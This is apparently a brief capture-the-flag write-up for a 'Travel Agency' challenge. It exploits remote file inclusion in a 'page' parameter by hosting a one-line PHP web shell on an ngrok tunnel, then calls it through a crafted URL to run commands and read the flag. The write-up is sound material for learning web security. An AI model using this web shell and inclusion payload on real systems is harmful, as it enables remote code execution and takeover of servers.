Travel Agency

Take a look at the page param

we confirm RFI via giving the url:

?page=http://3.6.126.48:50990/tours.php

So we start an ngrok server from our system , host a malicious file and get the RCE:

https://2cfd-2406-xxxx-72-d50f-174b-xxxx-898a-cc02.ngrok-free.app/a.php

<?php system($_GET['c']); ?>

when we do ls we get the secret html page:

http://3.6.126.48:50990/index.php?page=https://2cfd-2406-xxxx-72-xxxx-174b-e45b-xxxx-xxxx.ngrok-free.app/a.php&c=ls

Get the flag:

 PAYATU{BANDIT_1s_B4ND1T_RFI}

Last updated 6 months ago